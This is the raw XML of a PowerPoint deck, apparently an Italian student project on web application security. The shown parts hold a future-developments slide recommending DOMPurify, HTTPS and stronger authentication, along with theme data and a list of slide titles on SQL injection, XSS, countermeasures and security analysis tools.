        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2539981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Vulnerabilità del sistema</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6" descr="Avviso">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3785C915-32D7-C09B-CC82-A333C68D45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0099" y="625683"/>
            <a:ext cx="5455380" cy="5455380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3202230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10">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E7F19E0-303F-D977-3556-907DADE26EB3}"/>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dirty="0" err="1"/>
              <a:t>Sviluppi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1"/>
              <a:t>futuri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 16">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1401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22C413-CF49-ACF2-9C16-D7DF9D0F2735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Sviluppi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>futri</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto contenuto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F1C1CED-50CC-DDC8-4358-264FFA46706F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="2478024"/>
            <a:ext cx="10308645" cy="3694176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Alcuni dei possibili sviluppi futuri:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Sanitizzazione dei dati in input dell’utente con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Implementazione di un meccanismo di autenticazione più sicuro ed efficace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Impostare il server per comunicare tramite protocollo sicuro Https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Risolvere i problemi di sicurezza ricavati dall’analisi statica e dinamica, per i quali non sono state ancora implementate delle contromisure</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CasellaDiTesto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEBF3E6F-D5A4-B933-2EE3-E274ADDAFC6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156791" y="3319670"/>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3384366705"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="AccentBoxVTI">
  <a:themeElements>
    <a:clrScheme name="AnalogousFromRegularSeedLeftStep">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="203923"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E8E4E2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4499CC"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="30B2AC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="3CB77E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="32BA43"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="60B63C"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="8AAF2F"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="BE6C3C"/>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TotalTime>
  <Words>5374</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>479</Paragraphs>
  <Slides>91</Slides>
  <Notes>57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91</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="98" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Neue Haas Grotesk Text Pro</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>AccentBoxVTI</vt:lpstr>
      <vt:lpstr>WEB SECURITY  </vt:lpstr>
      <vt:lpstr>L’APPLICAZIONE WEB</vt:lpstr>
      <vt:lpstr>L’APPLICAZIONE WEB</vt:lpstr>
      <vt:lpstr>L’APPLICAZIONE WEB</vt:lpstr>
      <vt:lpstr>UI Login e Registrazione</vt:lpstr>
      <vt:lpstr>Tecnologie utilizzate</vt:lpstr>
      <vt:lpstr>Tecnologie utilizzate: server side</vt:lpstr>
      <vt:lpstr>Tecnologie utilizzate: client side</vt:lpstr>
      <vt:lpstr>Vulnerabilità del sistema</vt:lpstr>
      <vt:lpstr>Vulnerabilità del sistema</vt:lpstr>
      <vt:lpstr>Assenza di validità degli input e sanificazione</vt:lpstr>
      <vt:lpstr>SQL INJECTION</vt:lpstr>
      <vt:lpstr>SQL INJECTION</vt:lpstr>
      <vt:lpstr>SQL INJECTION</vt:lpstr>
      <vt:lpstr>Password storage</vt:lpstr>
      <vt:lpstr>Login e Registrazione</vt:lpstr>
      <vt:lpstr>Login e Registrazione</vt:lpstr>
      <vt:lpstr>Token di sessione</vt:lpstr>
      <vt:lpstr>Token di sessione</vt:lpstr>
      <vt:lpstr>Demo: Attacco SQL  Injection</vt:lpstr>
      <vt:lpstr>Accesso non autorizzato</vt:lpstr>
      <vt:lpstr>Accesso non autorizzato</vt:lpstr>
      <vt:lpstr>Eliminazione Table</vt:lpstr>
      <vt:lpstr>Update ruolo</vt:lpstr>
      <vt:lpstr>Demo: Attacco XSS</vt:lpstr>
      <vt:lpstr>Attacco Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Attacco Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Attacco Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Furto di cookie</vt:lpstr>
      <vt:lpstr>Furto di cookie</vt:lpstr>
      <vt:lpstr>Furto di cookie</vt:lpstr>
      <vt:lpstr>Furto di cookie</vt:lpstr>
      <vt:lpstr>Furto di cookie</vt:lpstr>
      <vt:lpstr>Furto di cookie</vt:lpstr>
      <vt:lpstr>Contromisure</vt:lpstr>
      <vt:lpstr>Contromisure adottate</vt:lpstr>
      <vt:lpstr>POST per login e registrazione</vt:lpstr>
      <vt:lpstr>Validazione input</vt:lpstr>
      <vt:lpstr>Validazione input client side</vt:lpstr>
      <vt:lpstr>Validazione input client side </vt:lpstr>
      <vt:lpstr>Validazione input client side</vt:lpstr>
      <vt:lpstr>Validazione input client side</vt:lpstr>
      <vt:lpstr>Validazione dati in input client side</vt:lpstr>
      <vt:lpstr>Validazione input server side </vt:lpstr>
      <vt:lpstr>Validazione input server side</vt:lpstr>
      <vt:lpstr>Validazione input server side</vt:lpstr>
      <vt:lpstr>Sanitizzazione input server side</vt:lpstr>
      <vt:lpstr>Sanitizzazione input server side</vt:lpstr>
      <vt:lpstr>Sanitizzazione output server side</vt:lpstr>
      <vt:lpstr>Escaping output lato server</vt:lpstr>
      <vt:lpstr>Escaping output client side</vt:lpstr>
      <vt:lpstr>DOMPurify</vt:lpstr>
      <vt:lpstr>DOMPurify</vt:lpstr>
      <vt:lpstr>DOMPurify</vt:lpstr>
      <vt:lpstr>Pro di DOMPurify</vt:lpstr>
      <vt:lpstr>Query parametrizzate</vt:lpstr>
      <vt:lpstr>Crittografia delle password</vt:lpstr>
      <vt:lpstr>Gestione sessione e cookie</vt:lpstr>
      <vt:lpstr>Gestione sessione e cookie</vt:lpstr>
      <vt:lpstr>Gestione sessione e cookie</vt:lpstr>
      <vt:lpstr>Gestione sessione e cookie</vt:lpstr>
      <vt:lpstr>Gestione sessione e cookie</vt:lpstr>
      <vt:lpstr>Analisi  statica</vt:lpstr>
      <vt:lpstr>SpotBugs</vt:lpstr>
      <vt:lpstr>SpotBugs</vt:lpstr>
      <vt:lpstr>SpotBugs</vt:lpstr>
      <vt:lpstr>SpotBugs</vt:lpstr>
      <vt:lpstr>SonarCloud</vt:lpstr>
      <vt:lpstr>SonarCloud</vt:lpstr>
      <vt:lpstr>SonarCloud</vt:lpstr>
      <vt:lpstr>SonarCloud</vt:lpstr>
      <vt:lpstr>SonarCloud</vt:lpstr>
      <vt:lpstr>Analisi  dinamica</vt:lpstr>
      <vt:lpstr>OWSAP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>Threat Modeling</vt:lpstr>
      <vt:lpstr>Threat modeling</vt:lpstr>
      <vt:lpstr>Threat modeling</vt:lpstr>
      <vt:lpstr>Threat modeling</vt:lpstr>
      <vt:lpstr>Threat modeling</vt:lpstr>
      <vt:lpstr>Sviluppi futuri</vt:lpstr>
      <vt:lpstr>Sviluppi futri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ATTACCO INFORMATICO  </dc:title>
  <dc:creator>ANNA GRAZIA CERVO</dc:creator>
  <cp:lastModifiedBy>ANNA GRAZIA CERVO</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-10T16:45:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-08T09:54:20Z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2023-07-10T18:36:53Z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5b82867c-44db-4bef-a1ea-7707f7be2617</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_2ad0b24d-6422-44b0-b3de-abb3a9e8c81a_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>